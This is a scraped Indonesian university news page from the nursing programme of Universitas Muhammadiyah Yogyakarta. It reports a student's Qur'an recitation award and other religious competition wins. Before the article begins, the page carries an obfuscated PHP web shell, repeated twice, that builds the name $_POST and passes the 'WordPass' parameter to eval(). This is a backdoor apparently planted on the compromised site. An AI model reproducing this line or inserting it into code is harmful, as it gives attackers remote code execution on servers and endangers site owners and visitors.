@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); Mahasiswi PSIK Raih Penghargaan Dalam Bidang Keagamaan | Keperawatan UMY

Sesuai dengan kata ‘Unggul dan Islami’ yang selama ini menjadi motto Universitas Muhammadiyah Yogyakarta, Program Studi Ilmu Keperawatan UMY selalu menerapkan makna tersebut dalam mendidik mahasiswa/i nya. Hal ini terbukti dengan banyaknya penghargaan yang telah diraih di berbagai bidang baik akademik maupun non akademik termasuk dalam bidang keagamaan. Terbukti dengan adanya penghargaan yang telah diraih oleh salah satu mahasiswi PSIK angkatan 2014 yaitu Sirli saat mengikuti acara kegiatan Gebyar Qur’ani dan Seni Islami Nasional yang diselenggarakan di Universitas Islam Negeri Sunan Gunung Djati Bandung dengan meraih Juara Harapan 1 MTQ Putri . Selain itu perwakilan dari PSIK UMY juga meraih prestasi saat mengikuti acara MTQ&LDK Book Fair Yogyakarta yang diselenggarakan oleh UKMI Jama’ah Al-Khawarizmi STTNAS Yogyakarta dengan berhasil mendapatkan juara 3 dan masih banyak lainnya.

Bukan hanya tingkat kota dan provinsi yang telah diikuti oleh mahasiswa/i PSIK UMY ,beberapa ajang nasional pun sering diikuti dan bahkan berhasil meraih juara sehingga dapat membawa nama harum Prodi maupun Universitas. Mengingat pentingnya agama dalam setiap kehidupan , diharapkan masih banyak mahasiswa/i lainnya untuk selalu meningkatkan iman dan taqwa mereka dan selalu memperbaiki diri menjadi lebih baik lagi agar kelak terciptalah mahasiswa/i PSIK UMY yang bukan hanya sukses dalam kehidupan dunia tetapi sukses pula akhiratnya. (a.r)